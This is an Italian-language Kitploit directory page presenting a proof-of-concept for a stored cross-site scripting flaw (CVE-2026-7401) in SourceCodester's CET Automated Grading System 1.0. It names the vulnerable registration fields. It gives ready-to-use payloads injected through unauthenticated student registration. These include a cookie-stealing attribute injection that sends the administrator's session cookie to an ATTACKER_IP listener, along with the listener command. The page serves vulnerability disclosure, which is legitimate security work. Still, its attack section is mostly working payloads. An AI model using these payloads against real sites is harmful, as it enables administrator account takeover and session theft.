Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/xmyronn/cve-2026-7401-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

Proof-of-concept per XSS persistente in SourceCodester CET Automated Grading System 1.0, che dimostra l'iniezione di payload non autenticata tramite la registrazione degli studenti che porta al dirottamento della sessione dell'amministratore.

Vedi Repository
34 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

XSS Memorizzato nel Sistema di Valutazione Automatica CET — Registrazione Studente (Non Autenticato → Pannello di Amministrazione)

Dettagli

CampoValore
VenditoreSourceCodester
URL del Venditorehttps://www.sourcecodester.com
ProdottoCET Automated Grading System con AI Predictive Analytics in PHP e MySQL
URL del Prodottohttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
Versione1.0
VulnerabilitàCross-Site Scripting Memorizzato (XSS)
CWECWE-79
Punteggio CVSSv38.8 (Alto)
Vettore di AttaccoRete
Autenticazione RichiestaNessuna (La registrazione autonoma dello studente è pubblica)
VittimaAmministratore
Interazione dell'UtenteRichiesta (L'amministratore visita il pannello)
RicercatoreImad Alvi
Data2026-04-13

Componente Interessato

File: PersonalAGS/index.php?action=register (Registrazione Studente)
Parametri: student_id, full_name, section, username (POST)
Attivato su: PersonalAGS/index.php?action=dashboard (Pannello di Amministrazione)


Descrizione

Il portale di registrazione autonoma degli studenti in CET Automated Grading System 1.0 non riesce a sanificare o codificare l'input fornito dall'utente prima di memorizzarlo nel database. Un attaccante non autenticato può registrare un account studente con payload JavaScript iniettati in qualsiasi campo di registrazione. Il payload dannoso viene memorizzato nel database e viene eseguito nel browser di qualsiasi amministratore che visita il pannello in cui sono elencati gli studenti iscritti.

Questa è una catena di attacco critica — non è richiesta alcuna autenticazione per iniettare il payload, ma questo viene eseguito in un contesto amministrativo privilegiato, consentendo il furto dei cookie di sessione e la completa compromissione dell'account amministratore.


Prova di Concetto

Passo 1 — Navigare alla Registrazione Studente (Nessuna Autenticazione Richiesta)

Navigare alla pagina pubblica di registrazione autonoma dello studente:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

Passo 2 — Iniettare il Payload XSS nei Campi di Registrazione

Compilare tutti i campi con payload XSS e fare clic su Registra Account:

  • Numero di Matricola Studente: "><svg onload=alert(1)>
  • Nome Completo: "><svg onload=alert(1)>
  • Sezione: "><svg onload=alert(1)>
  • Nome Utente Desiderato: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

La registrazione riesce — i payload vengono memorizzati nel database.

Passo 3 — L'XSS si Attiva sul Pannello di Amministrazione

Quando l'amministratore accede e visita il pannello, il payload iniettato viene eseguito immediatamente. Il popup di avviso si attiva e il layout della pagina risulta visibilmente compromesso dall'HTML iniettato — confermando che il payload viene renderizzato senza sanificazione nel pannello di amministrazione.

Anche le intestazioni delle sezioni del pannello riflettono i valori iniettati:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

Payload per il Dirottamento della Sessione

Un attaccante può elevare questo attacco al completo dirottamento della sessione amministrativa utilizzando il seguente payload nei campi di registrazione:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

Configurare un listener sulla macchina dell'attaccante:

root@kitploit:~
python3 -m http.server 8888

Quando l'amministratore visita il pannello, il cookie di sessione viene inviato al server dell'attaccante, consentendo la completa compromissione dell'account.


Impatto

Un attaccante non autenticato può:

  • Iniettare JavaScript persistente nel pannello di amministrazione tramite la registrazione pubblica degli studenti
  • Rubare il cookie di sessione dell'amministratore e compromettere l'account amministratore
  • Eseguire qualsiasi azione amministrativa per conto della vittima
  • Reindirizzare gli amministratori verso pagine dannose
  • Deturpare il pannello di amministrazione

Non è richiesta alcuna autenticazione per iniettare il payload. L'attacco viene eseguito automaticamente quando qualsiasi amministratore visita il pannello.


Riferimenti

  • SourceCodester — CET Automated Grading System
  • CWE-79: Neutralizzazione Impropria dell'Input Durante la Generazione di Pagine Web.
Scarica lo strumento